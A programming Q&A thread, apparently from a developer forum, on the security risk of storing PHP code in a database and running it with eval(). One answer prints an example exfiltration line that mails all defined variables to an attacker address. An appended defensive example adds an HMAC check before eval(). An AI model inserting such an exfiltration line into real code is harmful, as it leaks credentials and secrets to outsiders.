Is storing PHP code in a database and eval()ing it at runtime unsafe?

I created a program that stores, retrieves, and eval()s code from a SQLite database.

Before I get jumped on for my bad coding methods, let's just treat this as theoretical and pretend that I have a good reason for this.

All other considerations aside, and assuming that user input is not a factor, is there a security risk inherent in storing PHP code in the database and running it using eval()?

Explanations:

  • I am not eval()ing user content.
  • The SQLite DB file is in the same directory and has the same security as the rest of my files.
  • No comments on performance, caching, etc. I know about all this.
+4
6 answers

eval() itself is not insecure. It is just bad practice, incomprehensible, and open to a number of errors and security issues.

+5

Even if user data is not stored in your database, you still provide a way for code stored in the database to be executed, even if you did not place that code there. If someone gets access to your database server, they can potentially do something worse than drop the database by changing the code that it stores, for example deleting any files that the PHP script has write access to.

+1

Yes. If I can insert something into your database, I could execute it on your server via eval.

0

Are you trying to use the database as a hash table of functions? That way you can call a piece of code depending on the evaluation of some key. The security problem I see here is that another API may appear that populates the database somewhere. If you do not know about it, or do not explicitly do this yourself, a key/value pair can be entered into the database. If you used a function hash table instead, someone would need to commit to your code repository to change the function. So now you need to protect the database as well as your code repository.

0

You are allowing the database to run any PHP code it wants, as whatever user PHP runs as. Of course this is not safe.

0

eval() is inherently unsafe. But it is safe only if the code that it evaluates is safe. So we could come up with an example of code that does something bad, suppose there is some way that code got into your database, and there you go.

Code stored elsewhere is not part of your project, is not code reviewed, is not tracked in git, and is not tested. The code is generally not evaluated in terms of security, so there is no security guarantee. In other words, in terms of quality assurance, this is a poor-quality plan, since code security is part of code quality.

Anyone who has access to your database can modify the code, and then this code is executed, I guess without any review. The code has no access restrictions; it can reference and even change variables in the application that calls it. So the question is: how does the code in your database get changed? Who has access? What is the code review process? What is the testing process?

In addition to SQL injection, which can illegally modify PHP code in the database, there is also the security of whatever authentication you use for users before they can make authorized changes to the code. I assume that your application has some interface for changing the code in the database via the web.

You asked for evidence, by which I think you mean an example of code that could do something bad if it were evaluated.

If I can arrange for something like the following code to be stored in your database, and you eval() this code, I can get a lot of information about your application. For instance, your database password, authentication methods, the version of the framework you use... all kinds of things.

    mail('attacker@example.com', 'Mwa ha ha', print_r(get_defined_vars(), true));

There are similar functions like get_defined_functions(). Or even return the source code with open(__FILE__). An attacker can quickly find out where the other security vulnerabilities in your code are.

And then there are various ways that PHP code can get information about your server or make changes to your server. Combine eval() with code that uses exec(), and you can run any command on the server. At least it runs as the uid that runs the HTTP server, which I hope is not root.

0
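Two of the answers above make the same point: whoever can write to the database (directly, or through SQL injection) can change the code that gets eval()ed. The following is an added example, not code from the question or from any of the answers, of the narrowest mitigation that fits the asker's constraints: each stored snippet carries an HMAC tag computed with a key that lives outside the database (assumed here to be in an environment variable named SNIPPET_HMAC_KEY, a name chosen for this example), and the loader refuses to eval() a row whose tag does not verify. It uses an in-memory SQLite database and constructed sample rows so it runs stand-alone. It does not change the underlying design problem the answers describe; it only means that write access to the DB file alone is no longer enough to get code executed.

```php
<?php
// Added example (not from the question or any answer): an HMAC-checked snippet store.
// Assumption: the key is held outside the database, e.g. in an environment variable,
// so a database-only write (SQL injection, a stolen .sqlite file) cannot forge a tag.
$key = getenv('SNIPPET_HMAC_KEY') ?: 'constructed-demo-key-do-not-use';

$db = new PDO('sqlite::memory:');   // in-memory DB keeps the example self-contained
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE snippets (name TEXT PRIMARY KEY, code TEXT NOT NULL, tag TEXT NOT NULL)');

// Only the deploy step, which holds the key, can write a row that will later be accepted.
// The tag binds the code to its name, so a valid row cannot be copied under another name.
function store_snippet(PDO $db, string $key, string $name, string $code): void
{
    $tag  = hash_hmac('sha256', $name . "\0" . $code, $key);
    $stmt = $db->prepare('INSERT OR REPLACE INTO snippets (name, code, tag) VALUES (?, ?, ?)');
    $stmt->execute([$name, $code, $tag]);
}

// Load a snippet and verify its tag; eval() runs only after the check passes.
function run_snippet(PDO $db, string $key, string $name, array $args)
{
    $stmt = $db->prepare('SELECT code, tag FROM snippets WHERE name = ?');
    $stmt->execute([$name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        throw new RuntimeException("no snippet named $name");
    }
    $expected = hash_hmac('sha256', $name . "\0" . $row['code'], $key);
    // hash_equals() compares in constant time, avoiding a timing side channel.
    if (!hash_equals($expected, $row['tag'])) {
        throw new RuntimeException("integrity check failed for snippet $name; refusing to eval()");
    }
    // eval() inside a closure sees only $row and $args, not the caller's locals.
    // It can still reach $GLOBALS, so this is containment of accidents, not a sandbox.
    $fn = function () use ($row, $args) {
        return eval($row['code']);
    };
    return $fn();
}

// Constructed sample: a legitimate snippet written by the deploy step.
store_snippet($db, $key, 'double', 'return $args["x"] * 2;');
var_dump(run_snippet($db, $key, 'double', ['x' => 21]));

// Constructed tampering: a direct UPDATE, which is all that database access gives an
// attacker, changes the code but cannot produce a matching tag without the key.
$db->exec("UPDATE snippets SET code = 'return \"tampered\";' WHERE name = 'double'");
try {
    run_snippet($db, $key, 'double', ['x' => 21]);
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
```

Run it with the PHP CLI (`php snippets.php`, with the pdo_sqlite extension enabled). The second call is rejected before eval() is reached. Note what this does and does not protect: it defends the database as a storage location, but anyone who can read the key, or who can edit the snippets through the application's own authenticated interface, is still running code with the full privileges of the web server user, exactly as the last answer describes.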
